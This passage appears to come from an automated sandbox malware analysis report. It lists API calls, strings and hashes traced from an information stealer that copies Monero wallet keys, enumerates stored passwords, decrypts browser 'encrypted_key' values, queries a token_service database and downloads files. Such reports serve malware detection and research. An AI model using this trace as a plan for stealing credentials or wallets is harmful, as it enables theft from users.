                            • Part of subcall function 00928E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00928E52
                          • StrStrA.SHLWAPI(00000000,00000000), ref: 00925364
                          • lstrlen.KERNEL32(00000000), ref: 00925383
                          • lstrlen.KERNEL32(00000000), ref: 009253AE
                            • Part of subcall function 0092A740: lstrcpy.KERNEL32(00930E17,00000000), ref: 0092A788
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1746217241.0000000000911000.00000040.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                          • Associated: 00000000.00000002.1746202466.0000000000910000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1746217241.00000000009C1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1746217241.00000000009CD000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1746217241.00000000009F2000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1746217241.0000000000B5A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1746375557.0000000000B6E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1746375557.0000000000CF6000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1746375557.0000000000DD4000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1746375557.0000000000DF6000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1746375557.0000000000E00000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1746375557.0000000000E0E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1746689438.0000000000E0F000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1746906600.0000000000FA9000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1746933560.0000000000FAA000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_910000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Internetlstrcpylstrlen$HttpOpenRequest$AllocConnectLocalOptionSend
                          • String ID: ERROR$ERROR$ERROR$ERROR$ERROR
                          • API String ID: 3240024479-1526165396
                          • Opcode ID: 8b3578225bccd877e534fa15b9e188cec08a596eb01f042963ae7bb3ad530880
                          • Instruction ID: 07338da4d65fb6fae1bcdc6aaf9bdb0245959b22ae5b9c7d806a25db00efe307
                          • Opcode Fuzzy Hash: 8b3578225bccd877e534fa15b9e188cec08a596eb01f042963ae7bb3ad530880
                          • Instruction Fuzzy Hash: 07514F31911158ABCB18FF60ED92FED7779AF94300F504018F9066B1A6EF346B46CBA6
                          Memory Dump Source
                          • Source File: 00000000.00000002.1746217241.0000000000911000.00000040.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                          • Associated: 00000000.00000002.1746202466.0000000000910000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1746217241.00000000009C1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1746217241.00000000009CD000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1746217241.00000000009F2000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1746217241.0000000000B5A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1746375557.0000000000B6E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1746375557.0000000000CF6000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1746375557.0000000000DD4000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1746375557.0000000000DF6000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1746375557.0000000000E00000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1746375557.0000000000E0E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1746689438.0000000000E0F000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1746906600.0000000000FA9000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1746933560.0000000000FAA000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_910000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpylstrlen
                          • String ID:
                          • API String ID: 2001356338-0
                          • Opcode ID: 33bb9812b05595727150e0bace489d80172411c8efe6f0aa032fc5df1e9af086
                          • Instruction ID: 58edad4922e2105c385b9ecdf9fcc64728f681879e697cd9d374f3d54c73baf7
                          • Opcode Fuzzy Hash: 33bb9812b05595727150e0bace489d80172411c8efe6f0aa032fc5df1e9af086
                          • Instruction Fuzzy Hash: D8C187B69012299BCB14EF60EC89FEE7379BFA4304F0045D8F50A67245DE74AA85CF91
                          APIs
                            • Part of subcall function 00928DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00928E0B
                          • lstrcat.KERNEL32(?,00000000), ref: 009242EC
                          • lstrcat.KERNEL32(?,010502F0), ref: 0092430B
                          • lstrcat.KERNEL32(?,?), ref: 0092431F
                          • lstrcat.KERNEL32(?,0104F490), ref: 00924333
                            • Part of subcall function 0092A740: lstrcpy.KERNEL32(00930E17,00000000), ref: 0092A788
                            • Part of subcall function 00928D90: GetFileAttributesA.KERNEL32(00000000,?,00911B54,?,?,0093564C,?,?,00930E1F), ref: 00928D9F
                            • Part of subcall function 00919CE0: StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 00919D39
                            • Part of subcall function 009199C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 009199EC
                            • Part of subcall function 009199C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00919A11
                            • Part of subcall function 009199C0: LocalAlloc.KERNEL32(00000040,?), ref: 00919A31
                            • Part of subcall function 009199C0: ReadFile.KERNEL32(000000FF,?,00000000,0091148F,00000000), ref: 00919A5A
                            • Part of subcall function 009199C0: LocalFree.KERNEL32(0091148F), ref: 00919A90
                            • Part of subcall function 009199C0: CloseHandle.KERNEL32(000000FF), ref: 00919A9A
                            • Part of subcall function 009293C0: GlobalAlloc.KERNEL32(00000000,009243DD,009243DD), ref: 009293D3
                          • StrStrA.SHLWAPI(?,01050308), ref: 009243F3
                          • GlobalFree.KERNEL32(?), ref: 00924512
                            • Part of subcall function 00919AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00914EEE,00000000,00000000), ref: 00919AEF
                            • Part of subcall function 00919AC0: LocalAlloc.KERNEL32(00000040,?,?,?,00914EEE,00000000,?), ref: 00919B01
                            • Part of subcall function 00919AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00914EEE,00000000,00000000), ref: 00919B2A
                            • Part of subcall function 00919AC0: LocalFree.KERNEL32(?,?,?,?,00914EEE,00000000,?), ref: 00919B3F
                          • lstrcat.KERNEL32(?,00000000), ref: 009244A3
                          • StrCmpCA.SHLWAPI(?,009308D1), ref: 009244C0
                          • lstrcat.KERNEL32(00000000,00000000), ref: 009244D2
                          • lstrcat.KERNEL32(00000000,?), ref: 009244E5
                          • lstrcat.KERNEL32(00000000,00930FB8), ref: 009244F4
                          Memory Dump Source
                          • Source File: 00000000.00000002.1746217241.0000000000911000.00000040.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                          • Associated: 00000000.00000002.1746202466.0000000000910000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1746217241.00000000009C1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1746217241.00000000009CD000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1746217241.00000000009F2000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1746217241.0000000000B5A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1746375557.0000000000B6E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1746375557.0000000000CF6000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1746375557.0000000000DD4000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1746375557.0000000000DF6000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1746375557.0000000000E00000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1746375557.0000000000E0E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1746689438.0000000000E0F000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1746906600.0000000000FA9000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1746933560.0000000000FAA000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_910000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcat$FileLocal$AllocFree$BinaryCryptGlobalString$AttributesCloseCreateFolderHandlePathReadSizelstrcpy
                          • String ID:
                          • API String ID: 3541710228-0
                          • Opcode ID: 0cadd4622bdf64a9f8805a922663dc3c1127bdc3c17fb94760a7ad621165fe84
                          • Instruction ID: 59d25d937762dd1e90f29f49deacf5e0c12d59565c212378866aa1c7babfcbf9
                          • Opcode Fuzzy Hash: 0cadd4622bdf64a9f8805a922663dc3c1127bdc3c17fb94760a7ad621165fe84
                          • Instruction Fuzzy Hash: 43715976900218ABDB14EBA0EC95FEE777DAF88300F004598F605A7185EE75DB49CF91
                          APIs
                            • Part of subcall function 009112A0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 009112B4
                            • Part of subcall function 009112A0: RtlAllocateHeap.NTDLL(00000000), ref: 009112BB
                            • Part of subcall function 009112A0: RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 009112D7
                            • Part of subcall function 009112A0: RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 009112F5
                            • Part of subcall function 009112A0: RegCloseKey.ADVAPI32(?), ref: 009112FF
                          • lstrcat.KERNEL32(?,00000000), ref: 0091134F
                          • lstrlen.KERNEL32(?), ref: 0091135C
                          • lstrcat.KERNEL32(?,.keys), ref: 00911377
                            • Part of subcall function 0092A740: lstrcpy.KERNEL32(00930E17,00000000), ref: 0092A788
                            • Part of subcall function 0092A9B0: lstrlen.KERNEL32(?,01049D28,?,\Monero\wallet.keys,00930E17), ref: 0092A9C5
                            • Part of subcall function 0092A9B0: lstrcpy.KERNEL32(00000000), ref: 0092AA04
                            • Part of subcall function 0092A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0092AA12
                            • Part of subcall function 0092A8A0: lstrcpy.KERNEL32(?,00930E17), ref: 0092A905
                            • Part of subcall function 00928B60: GetSystemTime.KERNEL32(00930E1A,0104B3D0,009305AE,?,?,009113F9,?,0000001A,00930E1A,00000000,?,01049D28,?,\Monero\wallet.keys,00930E17), ref: 00928B86
                            • Part of subcall function 0092A920: lstrcpy.KERNEL32(00000000,?), ref: 0092A972
                            • Part of subcall function 0092A920: lstrcat.KERNEL32(00000000), ref: 0092A982
                          • CopyFileA.KERNEL32(?,00000000,00000001), ref: 00911465
                            • Part of subcall function 0092A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0092A7E6
                            • Part of subcall function 009199C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 009199EC
                            • Part of subcall function 009199C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00919A11
                            • Part of subcall function 009199C0: LocalAlloc.KERNEL32(00000040,?), ref: 00919A31
                            • Part of subcall function 009199C0: ReadFile.KERNEL32(000000FF,?,00000000,0091148F,00000000), ref: 00919A5A
                            • Part of subcall function 009199C0: LocalFree.KERNEL32(0091148F), ref: 00919A90
                            • Part of subcall function 009199C0: CloseHandle.KERNEL32(000000FF), ref: 00919A9A
                          • DeleteFileA.KERNEL32(00000000), ref: 009114EF
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1746217241.0000000000911000.00000040.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                           • Associated: 00000000.00000002.1746202466.0000000000910000.00000004.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1746217241.00000000009C1000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1746217241.00000000009CD000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1746217241.00000000009F2000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1746217241.0000000000B5A000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1746375557.0000000000B6E000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1746375557.0000000000CF6000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1746375557.0000000000DD4000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1746375557.0000000000DF6000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1746375557.0000000000E00000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1746375557.0000000000E0E000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1746689438.0000000000E0F000.00000080.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1746906600.0000000000FA9000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1746933560.0000000000FAA000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_910000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Filelstrcpy$lstrcat$CloseHeapLocallstrlen$AllocAllocateCopyCreateDeleteFreeHandleOpenProcessQueryReadSizeSystemTimeValue
                          • String ID: .keys$SOFTWARE\monero-project\monero-core$\Monero\wallet.keys$wallet_path
                          • API String ID: 3478931302-218353709
                          • Opcode ID: 284728ea427731e724f96b58c33385e861fc5111036fda8d8c5e2358baf0a2f6
                          • Instruction ID: 45ba227ec4dc7eaf1408ca1a0fbde1bdf06677134dd3f666703eaa7bc506efad
                          • Opcode Fuzzy Hash: 284728ea427731e724f96b58c33385e861fc5111036fda8d8c5e2358baf0a2f6
                          • Instruction Fuzzy Hash: 8A5137B2D5012957CB15FB60ED92FED737CAF94300F4045D8B60A62096EE706B89CFA6
                          APIs
                            • Part of subcall function 009172D0: memset.MSVCRT ref: 00917314
                            • Part of subcall function 009172D0: RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 0091733A
                            • Part of subcall function 009172D0: RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 009173B1
                            • Part of subcall function 009172D0: StrStrA.SHLWAPI(00000000,Password,00000000), ref: 0091740D
                            • Part of subcall function 009172D0: GetProcessHeap.KERNEL32(00000000,?), ref: 00917452
                            • Part of subcall function 009172D0: HeapFree.KERNEL32(00000000), ref: 00917459
                          • lstrcat.KERNEL32(00000000,009317FC), ref: 00917606
                          • lstrcat.KERNEL32(00000000,00000000), ref: 00917648
                          • lstrcat.KERNEL32(00000000, : ), ref: 0091765A
                          • lstrcat.KERNEL32(00000000,00000000), ref: 0091768F
                          • lstrcat.KERNEL32(00000000,00931804), ref: 009176A0
                          • lstrcat.KERNEL32(00000000,00000000), ref: 009176D3
                          • lstrcat.KERNEL32(00000000,00931808), ref: 009176ED
                          • task.LIBCPMTD ref: 009176FB
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1746217241.0000000000911000.00000040.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                           • Associated: 00000000.00000002.1746202466.0000000000910000.00000004.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1746217241.00000000009C1000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1746217241.00000000009CD000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1746217241.00000000009F2000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1746217241.0000000000B5A000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1746375557.0000000000B6E000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1746375557.0000000000CF6000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1746375557.0000000000DD4000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1746375557.0000000000DF6000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1746375557.0000000000E00000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1746375557.0000000000E0E000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1746689438.0000000000E0F000.00000080.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1746906600.0000000000FA9000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1746933560.0000000000FAA000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_910000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcat$Heap$EnumFreeOpenProcessValuememsettask
                          • String ID: :
                          • API String ID: 3191641157-3653984579
                          • Opcode ID: 29fe1ddd90e6c59cd65fe4383f0a2a6b574e4026fb316e1814985147b63828c8
                          • Instruction ID: 054c69c8d0a0dcaa48e31ad8daf03caf5af101b4a06718984245acbdf2332e3b
                          • Opcode Fuzzy Hash: 29fe1ddd90e6c59cd65fe4383f0a2a6b574e4026fb316e1814985147b63828c8
                          • Instruction Fuzzy Hash: F0312F72A04209EBCB04EBE4DC55EEF7775AB85302B144658E102B7160DE34A986DB52
                          APIs
                          • memset.MSVCRT ref: 00917314
                          • RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 0091733A
                          • RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 009173B1
                          • StrStrA.SHLWAPI(00000000,Password,00000000), ref: 0091740D
                          • GetProcessHeap.KERNEL32(00000000,?), ref: 00917452
                          • HeapFree.KERNEL32(00000000), ref: 00917459
                          • task.LIBCPMTD ref: 00917555
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1746217241.0000000000911000.00000040.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                           • Associated: 00000000.00000002.1746202466.0000000000910000.00000004.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1746217241.00000000009C1000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1746217241.00000000009CD000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1746217241.00000000009F2000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1746217241.0000000000B5A000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1746375557.0000000000B6E000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1746375557.0000000000CF6000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1746375557.0000000000DD4000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1746375557.0000000000DF6000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1746375557.0000000000E00000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1746375557.0000000000E0E000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1746689438.0000000000E0F000.00000080.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1746906600.0000000000FA9000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1746933560.0000000000FAA000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_910000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Heap$EnumFreeOpenProcessValuememsettask
                          • String ID: Password
                          • API String ID: 2808661185-3434357891
                          • Opcode ID: b0f42de98a81a6522f88d982d2c52157b63305aa5ddf3171e2f93f37d2841f30
                          • Instruction ID: def5ce88940f58f1aabf1e2d5e148ac5dc4e22ef087e0a7c9a22b7ec5d015e49
                          • Opcode Fuzzy Hash: b0f42de98a81a6522f88d982d2c52157b63305aa5ddf3171e2f93f37d2841f30
                          • Instruction Fuzzy Hash: 18613CB5A0426D9BDB24DB50CC51BDAB7B9BF88300F0081E9E649A6181DF745FC9CFA0
                          APIs
                            • Part of subcall function 0092A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0092A7E6
                            • Part of subcall function 009147B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00914839
                            • Part of subcall function 009147B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00914849
                          • InternetOpenA.WININET(00930DF7,00000001,00000000,00000000,00000000), ref: 0091610F
                          • StrCmpCA.SHLWAPI(?,01050A00), ref: 00916147
                          • InternetOpenUrlA.WININET(00000000,00000000,00000000,00000000,00000100,00000000), ref: 0091618F
                          • CreateFileA.KERNEL32(00000000,40000000,00000003,00000000,00000002,00000080,00000000), ref: 009161B3
                          • InternetReadFile.WININET(?,?,00000400,?), ref: 009161DC
                          • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 0091620A
                          • CloseHandle.KERNEL32(?,?,00000400), ref: 00916249
                          • InternetCloseHandle.WININET(?), ref: 00916253
                          • InternetCloseHandle.WININET(00000000), ref: 00916260
                          Memory Dump Source
                          • Source File: 00000000.00000002.1746217241.0000000000911000.00000040.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                           • Associated: 00000000.00000002.1746202466.0000000000910000.00000004.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1746217241.00000000009C1000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1746217241.00000000009CD000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1746217241.00000000009F2000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1746217241.0000000000B5A000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1746375557.0000000000B6E000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1746375557.0000000000CF6000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1746375557.0000000000DD4000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1746375557.0000000000DF6000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1746375557.0000000000E00000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1746375557.0000000000E0E000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1746689438.0000000000E0F000.00000080.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1746906600.0000000000FA9000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1746933560.0000000000FAA000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_910000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Internet$CloseFileHandle$Open$CrackCreateReadWritelstrcpylstrlen
                          • String ID:
                          • API String ID: 2507841554-0
                          • Opcode ID: 6fece53fb681cf9e26112b05c29e2bd61b14b891662da81a55d0a98b0e00bd3e
                          • Instruction ID: 6ba02c49d1d89c85062aaaba2107566fdccb0f2db0134fb47687623ee7416a2e
                          • Opcode Fuzzy Hash: 6fece53fb681cf9e26112b05c29e2bd61b14b891662da81a55d0a98b0e00bd3e
                          • Instruction Fuzzy Hash: 00513BB1A0021CABDB20DFA0DC59BEE77B8EB48705F108598E605A71C1DB746E89CF95
                          APIs
                            • Part of subcall function 0092A740: lstrcpy.KERNEL32(00930E17,00000000), ref: 0092A788
                            • Part of subcall function 0092A9B0: lstrlen.KERNEL32(?,01049D28,?,\Monero\wallet.keys,00930E17), ref: 0092A9C5
                            • Part of subcall function 0092A9B0: lstrcpy.KERNEL32(00000000), ref: 0092AA04
                            • Part of subcall function 0092A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0092AA12
                            • Part of subcall function 0092A920: lstrcpy.KERNEL32(00000000,?), ref: 0092A972
                            • Part of subcall function 0092A920: lstrcat.KERNEL32(00000000), ref: 0092A982
                            • Part of subcall function 0092A8A0: lstrcpy.KERNEL32(?,00930E17), ref: 0092A905
                            • Part of subcall function 0092A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0092A7E6
                          • lstrlen.KERNEL32(00000000), ref: 0091BC9F
                            • Part of subcall function 00928E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00928E52
                          • StrStrA.SHLWAPI(00000000,AccountId), ref: 0091BCCD
                          • lstrlen.KERNEL32(00000000), ref: 0091BDA5
                          • lstrlen.KERNEL32(00000000), ref: 0091BDB9
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1746217241.0000000000911000.00000040.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                           • Associated: 00000000.00000002.1746202466.0000000000910000.00000004.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1746217241.00000000009C1000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1746217241.00000000009CD000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1746217241.00000000009F2000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1746217241.0000000000B5A000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1746375557.0000000000B6E000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1746375557.0000000000CF6000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1746375557.0000000000DD4000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1746375557.0000000000DF6000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1746375557.0000000000E00000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1746375557.0000000000E0E000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1746689438.0000000000E0F000.00000080.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1746906600.0000000000FA9000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1746933560.0000000000FAA000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_910000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$lstrlen$lstrcat$AllocLocal
                          • String ID: AccountId$AccountTokens$AccountTokens$SELECT service, encrypted_token FROM token_service
                          • API String ID: 3073930149-1079375795
                          • Opcode ID: 9278b3981043cac3a68f7ebb3e08a50d8c67485b1f8e75a07a4e1deb7b2d21cb
                          • Instruction ID: 3c51e9cdb52a3b4134136bdb5b81dfcd13fdb927a7259aa7e987a337a20ff8b5
                          • Opcode Fuzzy Hash: 9278b3981043cac3a68f7ebb3e08a50d8c67485b1f8e75a07a4e1deb7b2d21cb
                          • Instruction Fuzzy Hash: CAB11F769101189BDB04FBA0ED96FEE733DAF94300F404568F506B7096EF346A49CBA6
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1746217241.0000000000911000.00000040.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                           • Associated: 00000000.00000002.1746202466.0000000000910000.00000004.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1746217241.00000000009C1000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1746217241.00000000009CD000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1746217241.00000000009F2000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1746217241.0000000000B5A000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1746375557.0000000000B6E000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1746375557.0000000000CF6000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1746375557.0000000000DD4000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1746375557.0000000000DF6000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1746375557.0000000000E00000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1746375557.0000000000E0E000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1746689438.0000000000E0F000.00000080.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1746906600.0000000000FA9000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1746933560.0000000000FAA000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_910000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: ExitProcess$DefaultLangUser
                          • String ID: *
                          • API String ID: 1494266314-163128923
                          • Opcode ID: a4cf0537ff5dca658b5be21a54ae98922fa096b8cd3a29386fda724568e7e9f1
                          • Instruction ID: 3c78edfea26c59d734225bb960f3449e5e79bd03828ab1ced10eb525945afd0c
                          • Opcode Fuzzy Hash: a4cf0537ff5dca658b5be21a54ae98922fa096b8cd3a29386fda724568e7e9f1
